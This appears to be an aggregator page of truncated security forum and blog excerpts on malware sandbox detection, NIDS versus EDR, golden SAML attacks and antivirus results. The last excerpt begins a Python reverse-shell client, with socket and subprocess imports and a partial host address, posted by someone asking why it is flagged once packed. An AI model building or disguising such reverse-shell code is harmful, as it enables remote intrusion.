Collaborate Disseminate
There is a lot of malware that can detect whether it is running inside a VM or sandboxed environment and if such environment is detected it can conceal it self and not execute. So why not make everything a VM? Now all systems are safe!
I k… Continue reading If malware does not run in a VM why not make everything a VM?
Although there already are devices that can detect harmful gases, most of them aren’t particularly portable, nor are they simple to use. An experimental new tool, however, is about the size of a hypodermic needle – and it could be utilized by anyone, a… Continue reading Portable Handy Pen designed for on-the-spot toxic gas detection
Does implementing a Network Intrusion Detection System (NIDS) give you any advantages over an Endpoint Detection and Response (EDR) solution?
I’ve been trying to do research on this, but are struggling to find good sources comparing the tw… Continue reading Is there any advantages in using a Network Intrusion Detection System, when already having a EDR solution?
How does one defend, detect and deter golden SAML attacks?
Continue reading How does one detect and deter golden SAML attacks?
The turning of the annual calendar was celebrated globally in a way not seen in a generation, but 2021 will…
The post 5 Modern Security Operations Trends That Will Dominate 2021 and Beyond appeared first on Siemplify.
The post 5 Modern Security Opera… Continue reading 5 Modern Security Operations Trends That Will Dominate 2021 and Beyond
On January, 6, 2021 we’ve seen a number of people storming the Capitol in Washington D.C.
As they were there inside for 1,5 hours with no supervision, and as there was no prior checking of who they are, it is possible that some of them cou… Continue reading How to sanitize the Capitol after the physical breach? [closed]
I got into a very insightful debate with somebody who will remain nameless in the beginning of this post, but will perhaps be revealed later. The debate focused on the role of context in threat detection.
Specifically, it is about the role of local con… Continue reading Role of Context in Threat Detection
Recently I downloaded Open Shell application and checked it via VirusTotal.
Most famous antiviruses like Bitdefender, Nrothon, Kaspersky found nothing.
But some of antiviruses thing there are some bad stuff in it.
Continue reading Is it safe to use an executable if only unknown antiviruses detected something?
I published the following diary on isc.sans.edu: “Malicious Python Code and LittleSnitch Detection“: We all run plenty of security tools on our endpoints. Their goal is to protect us by preventing infection (or trying to prevent it). But all those security tools are present on our devices like normal applications
The post [SANS ISC] Malicious Python Code and LittleSnitch Detection appeared first on /dev/random.
Continue reading [SANS ISC] Malicious Python Code and LittleSnitch Detection
When converting the reverse shell client.py python file to exe with pyinstaller it becomes detectable as a trojan on virustotal.com with most antivirus.
Here is my client file:
import os, socket, subprocess
s = socket.socket()
host = ‘192… Continue reading Reverse shell with python client side becomes detectable after converting with pyinstaller as exe file